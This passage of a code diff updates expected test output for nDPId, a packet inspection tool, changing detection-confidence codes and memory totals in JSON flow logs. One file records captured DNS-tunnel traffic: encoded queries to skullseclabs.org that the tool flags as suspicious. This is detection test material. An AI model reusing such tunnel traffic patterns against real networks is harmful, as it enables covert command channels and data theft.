+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558735043,"flow_last_seen":1625558735043,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558735043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1625558735164,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625558735164,"pkt":"YDjgxTWgeJS0JASgCABFAADM7yMAADIR\/IW11iOVwKgCZAG7wAAAuFhlVKuBgAABAAEAAAAAATIJc0VjVVJFZE5TBUFWQVN0A2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558735043,"flow_last_seen":1625558735164,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556067432,"flow_last_seen":1625556067553,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556100118,"flow_last_seen":1625556100236,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556102196,"flow_last_seen":1625556102314,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558730271,"flow_last_seen":1625558730389,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558735043,"flow_last_seen":1625558735164,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556067432,"flow_last_seen":1625556067553,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556100118,"flow_last_seen":1625556100236,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556102196,"flow_last_seen":1625556102314,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558730271,"flow_last_seen":1625558730389,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":77,"packets-processed":77,"total-skipped-flows":0,"total-l4-payload-len":8209,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":39,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":39,"total-idle-flows":39,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":209,"global_ts_msec":1625558735164} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 77/77 @@ -215,9 +215,9 @@ ~~ total active/idle flows...: 39/39 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5911956 bytes -~~ total memory freed........: 5911956 bytes -~~ total allocations/frees...: 118343/118343 +~~ total memory allocated....: 6045590 bytes +~~ total memory freed........: 6045590 bytes +~~ total allocations/frees...: 121105/121105 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 473 chars ~~ json string max len.......: 702 chars diff --git a/test/results/bad-dns-traffic.pcap.out b/test/results/bad-dns-traffic.pcap.out index e2bac629b..fa4ca26e2 100644 --- a/test/results/bad-dns-traffic.pcap.out +++ b/test/results/bad-dns-traffic.pcap.out @@ -2,30 +2,30 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1486012623234} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012623234,"flow_last_seen":1486012623234,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012623234,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1486012623234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012623234,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3821AAEARVP\/AqCtbBAICBIx+ADUAYyoIa68BAAABAAAAAAAAODA1ZTEwMGE2MjFjMzYyMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="} -00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012623234,"flow_last_seen":1486012623234,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012623234,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"05e100a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012623234,"flow_last_seen":1486012623234,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012623234,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"05e100a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1486012624242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012624242,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB38+5AAEARVH7AqCtbBAICBIx+ADUAY73N0g0BAAABAAAAAAAAODk1ODcwMGE2MjFjMzYyMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012623234,"flow_last_seen":1486012624242,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012624242,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012623234,"flow_last_seen":1486012624242,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012624242,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1486012624325,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1486012624325,"pkt":"5LMYS\/DDAhoR+f4qCABFAACaAABAADMRVUoEAgIEwKgrWwA1jH4AhhPK0g2BgAABAAEAAAAAODk1ODcwMGE2MjFjMzYyMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAcAMAA8AAQAAADwAFwAKEjYzNGYwMGE2MjEwMTBhMDAwMMBF"} -01080{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012623234,"flow_last_seen":1486012624325,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1486012624325,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} +01080{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012623234,"flow_last_seen":1486012624325,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1486012624325,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012635073,"flow_last_seen":1486012635073,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012635073,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1486012635073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012635073,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3+zhAAEARTTTAqCtbBAICBNwiADUAYwrvCk0BAAABAAAAAAAAODI0NDMwMGZkZjUyNTMyMDAyMTYzNmY2ZDZkNjE2ZTY0MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012635073,"flow_last_seen":1486012635073,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012635073,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"244300fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012635073,"flow_last_seen":1486012635073,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012635073,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"244300fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1486012636079,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012636079,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3+7NAAEARTLnAqCtbBAICBNwiADUAY1S7n3sBAAABAAAAAAAAODZiNTAwMGZkZjUyNTMyMDAyMTYzNmY2ZDZkNjE2ZTY0MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAAUAAQ=="} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012635073,"flow_last_seen":1486012636079,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012636079,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"6b5000fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012635073,"flow_last_seen":1486012636079,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012636079,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"6b5000fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1486012637085,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012637085,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3\/ElAAEARTCPAqCtbBAICBNwiADUAY0RMqrgBAAABAAAAAAAAOGUxOGYwMGZkZjUyNTMyMDAyMTYzNmY2ZDZkNjE2ZTY0MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAAUAAQ=="} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012635073,"flow_last_seen":1486012637085,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":273,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012637085,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e18f00fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 